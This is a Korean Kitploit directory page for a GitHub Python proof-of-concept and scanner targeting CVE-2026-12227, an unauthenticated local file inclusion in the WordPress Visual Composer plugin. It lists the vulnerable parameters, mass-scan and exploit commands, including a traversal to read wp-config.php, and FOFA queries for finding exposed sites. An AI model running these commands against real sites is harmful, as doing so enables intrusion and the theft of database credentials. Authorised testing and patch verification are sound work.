Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/murrez/cve-2026-12227
ReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubmurrez/cve-2026-12227

CVE-2026-12227

WordPress Visual Composer Website Builder의 vcv-template 파라미터를 통한 인증되지 않은 로컬 파일 포함 취약점인 CVE-2026-12227에 대한 Python 3 PoC 및 스캐너입니다.

110시간 12분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2026-12227 — Visual Composer Website Builder 인증되지 않은 LFI

CVE-2026-12227 (Wordfence)에 대한 Python 3 PoC: Visual Composer Website Builder(wordpress.org의 visualcomposer)의 vcv-template 쿼리 파라미터를 통한 로컬 파일 포함(Local File Inclusion).

플랫폼WordPress 플러그인
구성 요소Visual Composer Website Builder
영향 받는 버전≤ 45.16.0
수정된 버전> 45.16.0 (WP Trac 3619572) — 최신 안정 버전 사용 (예: 45.16.3+)
CVSS9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
인증인증 불필요
CWECWE-98
아님WPBakery (js_composer) 또는 SAP NetWeaver Visual Composer

요약

취약한 버전에서는 공개 페이지 로드 시 PageTemplatesController 내부의 WordPress template_include 처리 중 공격자가 제어하는 vcv-template(**vcv-template-type**과 함께)이 적용됩니다. 이를 통해 공격자가 선택한 디스크 상의 파일을 포함할 수 있으며, PHP 파일은 실행될 수 있습니다(RCE). Wordfence는 일부 환경에서 업로드된 "안전한" 확장자와의 연계 가능성을 언급합니다.

공격 표면

  • 플러그인이 설치되어 있고 VC로 제작된 프론트엔드 페이지가 필요합니다(일반 퍼머링크).
  • 프로브는 쿼리 파라미터를 추가합니다. 예: ?vcv-template-type=vc&vcv-template=blank 또는 vcv-template 하위의 LFI 경로.
  • 관련 파라미터: vcv-template-type, vcv-template-stretched.

요구 사항

root@kitploit:~
pip install -r requirements.txt

Python 3.8+.

사용법

root@kitploit:~
# Version + plugin + VC page crawl + template/LFI probes
python poc.py -u https://target.example --mode check

# Known VC landing page
python poc.py -u https://target.example --mode check --page-url /

# Mass scan
python poc.py --list targets.example.txt --mode check --threads 25 --quiet

# Custom include path (authorized testing only)
python poc.py -u https://target.example --mode exploit --page-url / --file ../../../../../../wp-config.php

# JSON for scripting
python poc.py -u https://target.example --mode check --json

출력

파일의미
cve_2026_12227_results.jsonl대상별 전체 JSON
hits.txt

상태 값

FOFA 힌트

root@kitploit:~
body="/wp-content/plugins/visualcomposer/"
body="data-vcv-" && body="wp-content"

기술 노트

  • 코드 경로: visualcomposer/Modules/Editors/Settings/PageTemplatesController.php (getCurrentTemplateLayout, viewPageTemplate).
  • Check는 파라미터 제어 또는 LFI 마커를 exploitable_candidate로 처리합니다. RCE로 단정하기 전에 스테이징 클론에서 확인하십시오.
  • 프리미엄 TemplateFilter / 테마 빌더 애드온은 일부 사이트에서 도달 가능한 경로를 넓힐 수 있습니다.

법적 고지

본인이 소유하거나 명시적 테스트 허가를 받은 시스템에서만 사용하십시오.

도구 다운로드
후보 호스트명
candidates.jsonlcheck 모드 요약 (page_url, status, lfi)
상태의미
lfi_confirmed응답이 wp-config / /etc/passwd / version.php 휴리스틱과 일치
vcv_template_controllablevcv-template=blank가 기준선 대비 레이아웃을 변경(취약 파라미터가 적용됨)
plugin_vuln_no_surface오래된 플러그인 버전이지만 VC 페이지가 없거나 파라미터가 무시됨
no_vc_page플러그인은 존재하나 크롤링된 경로에 VC 마커가 없음
patched버전 > 45.16.0